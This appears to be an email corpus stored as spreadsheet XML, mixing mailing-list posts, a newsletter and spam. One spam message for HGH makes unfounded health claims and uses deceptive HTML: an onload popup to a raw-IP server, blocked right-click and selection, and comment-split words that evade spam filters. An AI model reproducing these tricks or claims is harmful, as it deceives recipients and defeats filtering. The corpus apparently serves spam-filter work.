 &gt; Yes, I'm saying that if he extends "genetic engineering" to include
 &gt; selecting animals to breed, he must extend it to include selecting
 &gt; people to breed with.
 &gt; 
 &gt; &gt; Unless your parents were selectively bred like livestock to produce
 you,
 &gt; &gt; I don't think you can make that case...  :-)
 &gt; 
 &gt; I'm saying that my parents selected each other, and that they did so
 &gt; because (among other reasons) each wanted the other's genes to be
 &gt; mixed with their own in the offspring that they were planning.
 &gt; 
 &gt; What does it matter that they were selecting to produce their own
 &gt; offspring, rather than the offspring of two unrelated animals?
 &gt; 
 &gt; --
 &gt; Karl Anderson      kra@monkey.org
 http://www.monkey.org/~kra/
 &gt; http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Quitting Music
</t>
  </si>
  <si>
    <t xml:space="preserve">Don't get your hopes up.   This a career move.   Next stop Hollywood.
 Remember Madonna, The Actress?
 Eirikur
 On Wednesday 07 August 2002 06:56 pm, John Evdemon wrote:
 &gt; Keep your fingers crossed...
 &gt; Exhausted Britney 'wants to quit music'
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, Jul 21, 2002 at 01:47:39AM +0100, Paul Jakma wrote:
 &gt; isnt this standard behaviour?? mv uses rename() which replaces the
 &gt; new path name:
 why, yes.  yes it is.  i think that was my point.
 &gt; yes it does. :)
 &gt; 
 &gt; but your super-links dont is what you're saying i guess. but why? why
 &gt; would you want a symlink, bar, linking to foo, to stop linking if foo
 &gt; is changed?
 uh, i wouldn't.  i was referring to the previous message which discussed
 the idea of a symlink that referred to a 64 bit device id and the inode
 of the file.  i gave two examples of why it wouldn't work.
 &gt; &gt;     % ln -ss foo bar
 &gt; &gt;     % ls -i foo
 &gt; &gt;     111 foo
 &gt; &gt;     % rm foo
 &gt; &gt;     % touch floyd
 &gt; &gt;     % ls -i floyd
 &gt; &gt;     111 floyd
 &gt; is this an example of inode reuse? :) or do you mean that somehow 
 &gt; floyd is the new foo, (foo is dead, all hail floyd) and that bar now 
 &gt; points to floyd?
 yes.  i did fail to mention that floyd might not use inode 111, but
 it might.  and that was my point, having these mythical symlinks point
 to the device+inode is not simple.  just like the unrm thing, it might
 be possible, but hard links and soft links are the best implementations
 that have survived to date on unix.  windows shortcuts are kinda weird -
 they're really an application level thing.
 mac aliases seem to take the idea of unix symlinks (linking by filename)
 along with the concept of device+inode.  i don't know mac internals,
 but i seem to remember being told it tried the former first, and then
 tried the latter.  how it would deal with the 2nd example i mentioned i
 dunno - i'm not certain if the mac version of inodes would suffer from
 that (maybe the fs identifier for the file included the creation time
 or something like that).
 &gt; how do i control this 'symlinks magically link to new files' feature?
 i think it would be difficult.  it would also fail to work in numerous
 situations.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</si>
  <si>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Subject: yyyy,Free 30 day supply of HGH- $49.95 value!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body onload="window.open('http://202.101.163.34:81/ultimatehgh_run/')" bgColor="#CCCCCC" topmargin=1 onMouseOver="window.status=''; return true" oncontextmenu="return false" ondragstart="return false" onselectstart="return false"&gt;
 &lt;div align="center"&gt;Hello, jm@netnoteinc.com&lt;BR&gt;&lt;BR&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;/div&gt;&lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Human Growth Hormone Therapy&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Lose weight while building lean muscle mass&lt;br&gt;and reversing the ravages of aging all at once.&lt;/font&gt;&lt;font face="Arial" size="3"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;font face="Arial" size="3"&gt; &lt;br&gt;Remarkable discoveries about Human Growth Hormones (&lt;b&gt;HGH&lt;/b&gt;) &lt;br&gt;are changing the way we think about aging and weight loss.&lt;/font&gt;&lt;/p&gt;
 &lt;center&gt;&lt;table width="481"&gt;&lt;tr&gt;&lt;td height="2" width="247"&gt;&lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;Lose Weight&lt;br&gt;Build Muscle Tone&lt;br&gt;Reverse Aging&lt;br&gt;
 Increased Libido&lt;br&gt;Duration Of Penile Erection&lt;br&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;td height="2" width="222"&gt;&lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;Healthier Bones&lt;br&gt;
 Improved Memory&lt;br&gt;Improved skin&lt;br&gt;New Hair Growth&lt;br&gt;Wrinkle Disappearance &lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;&lt;/table&gt;&lt;/center&gt;
 &lt;p align="center"&gt;&lt;a href="http://202.101.163.34:81/ultimatehgh_run/"&gt;&lt;font face="Arial" size="4"&gt;&lt;b&gt;Visit 
   Our Web Site and Learn The Facts : Click Here&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
   &lt;br&gt;
   &lt;a href="http://202.96.124.10:81/ultimatehgh_run/"&gt;&lt;font size="4"&gt;&lt;b&gt;OR 
   Here&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;div align="center"&gt;&lt;br&gt;
   You are receiving this email as a subscr&lt;!--jm--&gt;iber&lt;br&gt;
   to the Opt&lt;!--jm--&gt;-In Ameri&lt;!----&gt;ca Mailin&lt;!----&gt;g Lis&lt;!----&gt;t. &lt;br&gt;
 To remo&lt;!--jm--&gt;ve your&lt;!----&gt;self from all related mailli&lt;!--me--&gt;sts,&lt;br&gt;just &lt;a href="http://64.123.160.91:81/ultimatehgh_run/remove.php?userid=jm@netnoteinc.com"&gt;Click Here&lt;/a&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Problems with xosd-xmms
</t>
  </si>
  <si>
    <t xml:space="preserve">After installing and enabling xosd-xmms I get the following error when
 trying to start xmms
 Xlib: unexpected async reply (sequence 0x30)!
 xmms starts, but it does not detect mouse commands.
 Thanks,
 Mike
 -- 
 D. Michael Basinger
 dbasinge@speakeasy.net
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: testing for taint.org, part 2
</t>
  </si>
  <si>
    <t xml:space="preserve">Here is your administrator password for your Quick Topic(SM)
 topic "testing for taint.org, part 2", as you requested:
     litheers
 Use your browser to follow the 'Admin/Delete' link on your topic
 page, or instead go straight to the following web address, where
 you can delete individual messages or delete the entire topic:
 http://www.quicktopic.com/16/A/ESg5mArsyEDK
 Once there, you'll be asked to enter the password given above.
 If you didn't request this password, then perhaps one of your
 topic's readers mistakenly requested it.  In that case, you can
 ignore this message. As the topic's creator, you're the only one
 who received it. As a reminder, your topic is located at the
 following web address:
 http://www.quicktopic.com/16/H/ESg5mArsyEDK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</si>
  <si>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=3D28-A2wXIRd4OHvEluZEL2t1VlTK8yiR" &gt;&lt;img src=3D"http://www.zdnet.com/graph=
 ics/newsletters/hd_anchor.gif" width=3D"440" height=3D"60" border=3D"0"  al=
 t=3D"AnchorDesk Daily"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D160 align=3Dcenter valign=3Dtop rowspan=3D2 bgcolor=3D"#ffffff"=
 &gt;
         &lt;img src=3D"http://www.zdnet.com/techupdate/i/gl_ad2.gif" width=3D"=
 160" height=3D"16" border=3D"0"  alt=3D"Advertisement"&gt;&lt;br&gt;
         &lt;!--tower --&gt;
       &lt;iframe src=3D"http://www.zdnet.com/include/ads/ifc/RGROUP=3D2766" sc=
 rolling=3D"no" frameborder=3D"0" hspace=3D"0" vspace=3D"0" height=3D"600" w=
 idth=3D"160" marginheight=3D"0" marginwidth=3D"0"&gt;
 &lt;script language=3D"JavaScript" src=3D"http://www.zdnet.com/include/ads/js/=
 RGROUP=3D2766"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;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href=3D"http://clickthru.online.com/Click?q=3D2c-DatOIc0=
 D7TOa1DHc-r7MBvWpjuyR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Veritas CEO Gary Bloom speaks out at Tech Update.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;img s=
 rc=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D"6"&gt;&lt;br=
 &gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D41-qqJ1IEK=
 ImbN-LLfU5CfCkxHB0FFR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Check out these personal laser printer picks at ZDNet Reviews.&lt;/b&gt;&lt;/font&gt;&lt;/=
 a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" hei=
 ght=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D56-NwKYInn=
 s9SfaBZErctPQDwwaMC9R" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 See how WAP works and how you should use it at Builder.com.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;=
 br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=
 =3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D6b-8g5ZIHE=
 cwpy9OqK80ywQ-4d0P6cR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Need a new job? Find one today in ZDNet's Career Center.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt;=
  &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D=
 "6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D80-KTKvQQ0=
 KirA2TVIoaDkjVsTLZ8iR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 CIOs talk out about the future of IT at CNET News.com.&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;=
 img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" height=3D"6=
 "&gt;&lt;br&gt;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&gt;THU JUL 11,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ck?q=3D96-pjdWQtduMsjnk1njZWSoS2P4Jm4R" &gt;&lt;b&gt;Next MS Office? Here's what I'd=
  add--and delete&lt;/A&gt;&lt;/B&gt;&lt;/font&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphic=
 s/clear.gif" width=3D"1" height=3D"4"&gt;&lt;br&gt;
                 The next version of Microsoft Office is due in the next yea=
 r or so. If you were product manager for the industry-standard office suite=
 , what would you add? What would you get rid of? What would you fix? Here's=
  my wish-list Top Ten.&lt;p&gt;
         =20
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dab-ZcQKQYp=
 dYiCIewPXydit0M-0OvrR" &gt;&lt;b&gt;NOTE: Why we're changing our publishing schedule=
 &lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage=
 /b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dc0-kfs-QWP=
 2ztPrXYT41H99K8FZuSiR" &gt;&lt;b&gt;PLUS: AnchorDesk Radio: The changing geography o=
 f the Net&lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/=
 frontpage/b.gif"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href=3D"http://clickthru.online.com/Click?q=3Dd5-p-viQzL1as56bE2=
 HCu4jNix1DPPR" &gt;Feds focus on cybersecurity... Passport rival... Larger iMa=
 c LCD &lt;/a&gt;&lt;p&gt;
         =20
        =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3Dea-fjLyQhV4N6GaQNz=
 AwQ4lAUw-5WnR" &gt;Want to stop spam? Here's how YOU do it &lt;/a&gt;&lt;p&gt;
         =20
        =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3Dff-sVoVQms4eirO6Cn=
 ZxrhBm0WHtheR" &gt;Tablet PCs: Very cool, but not for the masses&lt;/a&gt;&lt;p&gt;
                =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D14-5MRAIF-zaHkjyud=
 8ZvQIzTKtR1yR" &gt;Keep your PC's clock up to the second! Here's how&lt;/a&gt;&lt;p&gt;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cellspacing=
 =3D"0" border=3D"0" bgcolor=3D"#ffffff"&gt; &lt;tr bgcolor=3D"#999999"&gt;&lt;td colspa=
 n=3D"7" height=3D"15"&gt;&lt;font face=3D"ms sans serif, geneva" color=3D"#ffffff=
 " size=3D"-2"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpag=
 e/b.gif" height=3D1 width=3D3&gt;&lt;b&gt;Crucial Clicks: More from ZDNet&lt;/b&gt;&lt;/font&gt;=
 &lt;/td&gt;&lt;/tr&gt; &lt;tr&gt; &lt;td bgcolor=3D"#999999" rowspan=3D"3"&gt;&lt;img src=3D"http://ww=
 w.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/td&gt;=
  &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fro=
 ntpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt; &lt;td colspan=3D"3"&gt;&lt;img src=3D"http=
 ://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D5 width=3D1&gt;=
 &lt;/td&gt; &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordes=
 k/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt; &lt;td bgcolor=3D"#999999" rowsp=
 an=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.g=
 if" height=3D1 width=3D1&gt;&lt;/td&gt; &lt;/tr&gt; &lt;tr valign=3D"top"&gt; &lt;td width=3D"100%"=
 &gt;   &lt;table width=3D"100%"  cellpadding=3D"0" cellspacing=3D"0" border=3D"0"=
 &gt;        &lt;tr&gt;&lt;td colspan=3D"3"&gt;&lt;font face=3D"verdana, geneva" color=3D"#333=
 333" size=3D"-2"&gt;&lt;b&gt;Laptops&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/b.gif" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr=
 &gt;     &lt;tr valign=3D"top"&gt;       &lt;td width=3D"85"&gt;&lt;a href=3D"http://clickthr=
 u.online.com/Click?q=3D29-Sg_rIjMAHELne5dNyGEI9rCM8vlR" &gt;&lt;img src=3D"http:/=
 /www.zdnet.com/products/graphics/042502_p4_laptop.jpg" width=3D"85" height=
 =3D"110" border=3D"0" alt=3D"" /&gt;&lt;/a&gt;&lt;/td&gt;       &lt;td width=3D"5"&gt;&lt;img src=
 =3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 wi=
 dth=3D5&gt;&lt;/td&gt;        &lt;td width=3D"100%"&gt;&lt;font face=3D"arial, helvetica" siz=
 e=3D"-1"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D3f-4sAEIqMW45fOpy=
 SHcoh57BymNzeR" style=3D"text-decoration:none"&gt;&lt;b&gt; 2GHz to Go&lt;/b&gt;&lt;/a&gt; &lt;br /=
 &gt;Intel's got two new 2GHz chips for portables. But if you have to ask how m=
 uch the jump from 1.8GHz to 2GHz will cost you, you probably can't afford i=
 t. &lt;/font&gt;&lt;/td&gt;   &lt;/tr&gt;   &lt;tr&gt;&lt;td colspan=3D"3"&gt;&lt;img src=3D"http://www.zdne=
 t.com/graphics/anchordesk/frontpage/b.gif" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;img =
 src=3D"http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width=3D"8"=
  height=3D"10" border=3D"0" alt=3D"" /&gt;&lt;font face=3D"arial, helvetica" size=
 =3D"-1"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D54-l6ovIZKARE6L4-Z=
 0O9U4lR0vdksR" style=3D"text-decoration:none"&gt;Read reviews&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;=
 /tr&gt;        &lt;/table&gt; &lt;/td&gt; &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/an=
 chordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt; &lt;td width=3D"180"&gt;  &lt;t=
 able cellpadding=3D"0" cellspacing=3D"0" width=3D"180" border=3D"0" bgcolor=
 =3D"#eeeeee"&gt;        &lt;tr bgcolor=3D"#999999"&gt;&lt;td colspan=3D"3" height=3D"15=
 "&gt;&lt;font face=3D"ms sans serif, geneva" color=3D"#ffffff" size=3D"-2"&gt;&lt;img s=
 rc=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 =
 width=3D3&gt;Most Popular Products&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;      &lt;tr&gt;    &lt;td&gt;&lt;img src=
 =3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"10" =
 height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;         &lt;td&gt;&lt;font face=3D"ms san=
 s serif, geneva" size=3D"-2"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anch=
 ordesk/frontpage/b.gif" width=3D"1" height=3D"5" alt=3D"" border=3D"0" /&gt;&lt;b=
 r /&gt;    &lt;b&gt;Laptops&lt;/b&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/ancho=
 rdesk/frontpage/b.gif" width=3D"1" height=3D"7" alt=3D"" border=3D"0" /&gt;&lt;br=
  /&gt;         &lt;b&gt;1&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/Click?q=3D69-C=
 Y-iIoWgGqlV_WuMoAH4OpRzLxFR" style=3D"text-decoration:none"&gt;Gateway 600XL&lt;/=
 a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gi=
 f" width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;        &lt;b&gt;2&lt;/b&gt;.=
  &lt;a href=3D"http://clickthru.online.com/Click?q=3D7e-XDXeInptAgOiFQti6pURwM=
 popr9R" style=3D"text-decoration:none"&gt;Dell Inspiron 2600 series&lt;/a&gt;&lt;br /&gt;&lt;=
 img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=
 =3D"1" height=3D"6" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;    &lt;b&gt;3&lt;/b&gt;. &lt;a href=3D"=
 http://clickthru.online.com/Click?q=3D93-V4PmQSdQT6bS03GcTYjvQ8Rgn5rR" styl=
 e=3D"text-decoration:none"&gt;Dell Inspiron 8200 series&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"h=
 ttp://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=
 =3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;   &lt;b&gt;4&lt;/b&gt;. &lt;a href=3D"http://clickth=
 ru.online.com/Click?q=3Da8-02XZQQZk8ceXLNTDtZs6swzdONiR" style=3D"text-deco=
 ration:none"&gt;Toshiba Satellite 2400-S251&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zd=
 net.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=
 =3D"" border=3D"0" /&gt;&lt;br /&gt;         &lt;b&gt;5&lt;/b&gt;. &lt;a href=3D"http://clickthru.o=
 nline.com/Click?q=3Dbd-c0nUQ7pyt1bYJtDpAEVgnfqGsJPR" style=3D"text-decorati=
 on:none"&gt;Dell SmartStep 100N&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/grap=
 hics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" border=
 =3D"0" /&gt;&lt;br /&gt;  &lt;img src=3D"http://techupdate.zdnet.com/techupdate/i/arrow=
 _blue.gif" width=3D"8" height=3D"10" border=3D"0" alt=3D"" /&gt;&lt;b&gt;&lt;a href=3D"=
 http://clickthru.online.com/Click?q=3Dd2-THo_QULwlGAjAPt3Gl22vbAOyenR" &gt;Mor=
 e popular laptops&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;  &lt;img src=3D"http://www.zdnet.com/graphics/=
 anchordesk/frontpage/b.gif" width=3D"1" height=3D"10" alt=3D"" border=3D"0"=
  /&gt;&lt;br /&gt;    &lt;/font&gt;&lt;/td&gt;    &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/=
 anchordesk/frontpage/b.gif" width=3D"10" height=3D"1" alt=3D"" border=3D"0"=
  /&gt;&lt;/td&gt;         &lt;/tr&gt;   &lt;/table&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr valign=3D"top"&gt;&lt;td colspa=
 n=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gi=
 f" height=3D5 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt; &lt;tr&gt;&lt;td colspan=3D"7" bgcolor=3D"#999999=
 "&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" hei=
 ght=3D1 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt; &lt;/table&gt; &lt;!-- /### --&gt; &lt;table cellpadding=3D10=
  border=3D0 cellspacing=3D0&gt;
 &lt;tr&gt;&lt;td&gt;=20
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3De7-2y-GQmVXfHvnRGUVqS8CMB0qvseR"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://clickthru.online.com/Click?q=3Dfd-BXDMQgOrleynyrQO_Iti64Q9t8PR" &gt;&lt;b&gt;Feds=
  focus on cybersecurity... Passport rival... Larger iMac LCD&lt;/b&gt;&lt;/a&gt;&lt;br&gt;Was=
 hington's finally realizing that cybersecurity is a key part of homeland de=
 fense. Plus: Sun's Liberty Alliance releases specs for a Microsoft Passport=
  rival. And expect an iMac with a 17-inch display at Macworld. &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;
          &lt;!--------AD-----------------------------------&gt;
        =20
 &lt;!--------/AD-----------------------------------&gt;
 &lt;br&gt;
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3D12-jaAKIl-XieZXcbr-pEvKY-qkCKnR" &gt;&lt;img src=3D"http://www.zdnet.co=
 m/graphics/anchordesk/frontpage/header2_your.gif" width=3D"150" height=3D"2=
 0" border=3D"0" vspace=3D10 alt=3D"News Analysis"&gt;&lt;/a&gt;&lt;br&gt; &lt;table cellpaddi=
 ng=3D0 cellspacing=3D0 border=3D0&gt;
                 &lt;tr&gt;
                 &lt;td bgcolor=3D"#E4F2FF"&gt;&lt;font face=3D"Arial, Helvetica" siz=
 e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;DAVID MORGENSTERN&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/445.gif" alt=3D"DAVID MORGENSTERN" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"5"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;&lt;a href=3D"http=
 ://clickthru.online.com/Click?q=3D27-z9ZmIqI2addnMFcSkMRUVolYrBeR" &gt;&lt;b&gt;Want=
  to stop spam? Here's how YOU do it&lt;/b&gt;&lt;/a&gt;&lt;br&gt;Some of you love SpamNet, a =
 spam-killing app recommended by David Coursey. But others say it blocks too=
  many wanted e-mails, and offer their own tips and tricks for minimizing ju=
 nk e-mail. David rounds up your suggestions. &lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
         =20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e=3D"-1"&gt;&lt;b&gt;&amp;nbsp;DAVID BERLIND&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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ontpage/authors/390.gif" alt=3D"DAVID BERLIND" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;td width=3D8&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fr=
 ontpage/b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
                 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D3c-tK4RIcI=
 slDUZNzzzY0VXXjhrHNHyR" &gt;&lt;b&gt;Tablet PCs: Very cool, but not for the masses&lt;/b=
 &gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.gif"=
  width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 While tablet PCs offer cool features, like letting you scri=
 bble notes on the screen and swivel the display, David's not sure they're r=
 ight for everyone. Why? For starters, they're expensive and impractical for=
  traveling.&lt;/font&gt;&lt;/td&gt;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href=3D"http://clickthru.online.com/Click?q=3D51-QgUWIjJ=
 PuvC2HDNJlh9GpMUHM3FR" &gt;&lt;b&gt;Keep your PC's clock up to the second! Here's ho=
 w&lt;/b&gt;&lt;/a&gt;&lt;br clear=3D"all"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/clear.=
 gif" width=3D"1" height=3D"4"&gt;&lt;br clear=3D"all"&gt;
                 Your PC, powerful as it may be, is truly pitiful at keeping=
  track of time. But take heart. Preston has three, free downloads that sync=
 h your PC's clock with atomic-clock servers, guaranteeing you'll always hav=
 e the right time.&lt;/font&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;/table&gt;&lt;p&gt;
         &lt;P&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;  =20
 &lt;p&gt;
 &lt;hr size=3D1 width=3D"80% noshade align=3D"left"&gt;
 &lt;font face=3D"Arial, Helvetica" size=3D"-1"&gt;
 &lt;div align=3Dcenter&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D66-kDH_IyWIFd6oGIJsPj9y-Dz=
 bW-9R" &gt;&lt;b&gt;AnchorDesk Home&lt;/b&gt;&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com=
 /Click?q=3D7b-prT_IBZIOdLyohzbDr4q1O7VpJcR"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rl_login?email=3Dqqqqqqqqqq-zdnet@example.com&amp;brand=3Dzdnet'&gt;free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href=3D'http://clickthru.online.com/Click?q=3D91-EZrprxz=
 LcQ2WS04zMKzUVjcon9Yzx9RR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dlegit-=
 list-zdnet@example.com&amp;brand=3Dzdnet'&gt;Manage=20
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href=3D"http://clickthru.online=
 .com/Click?q=3Da6-9zw4QCUBEqVcRtUOvAKcnvjbgw4R" &gt;FAQ&lt;/A&gt;&amp;nbsp;|=20
         &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dbb-yT94QYZBR=
 CAbFcWRaT-Dc13yE_rR"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href=3D"http://clickthru.online.com/Click?q=3Dd0-vjDhQWWF=
 rozv0Lo7c7YuNDxuyCiR" &gt;&lt;img src=3D"http://www.zdnet.com/graphics/newsletter=
 s/gl_ft.gif" width=3D75 height=3D43 border=3D0 alt=3D"ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D525&gt;&lt;font face=3D"arial, helvetica" size=3D"-2" color=3D"#fffff=
 f"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3De5-9Z7OQgyw_MN2OwKjnbcu=
 mX6cvbPR" style=3D"color: #fff"&gt;Home&lt;/a&gt; |&lt;a href=3D"http://clickthru.onlin=
 e.com/Click?q=3Dfa-FmqNQhO2Y5fZUOntvDA4oSMpoLnR" style=3D"color: #fff"&gt;eBus=
 iness&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=3D0f-RM2lIqjktmy=
 MDzRsUb9HGRJ1bfeR" style=3D"color: #fff"&gt;Security&lt;/a&gt; | &lt;a href=3D"http://c=
 lickthru.online.com/Click?q=3D24-8DdMIcz6q-1qRO0geUef92iqrwyR" style=3D"col=
 or: #fff"&gt;Networking&lt;/a&gt; | &lt;a href=3D"http://clickthru.online.com/Click?q=
 =3D3a-QAmgIrzD8mjZonA7JR1rqAFZcCnR" style=3D"color: #fff"&gt;Applications&lt;/a&gt; =
 | &lt;a href=3D"http://clickthru.online.com/Click?q=3D4f-Iar4IIU8lz6DSo-8g-rrs=
 LKFK0uR" style=3D"color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href=3D"http://clickthru.=
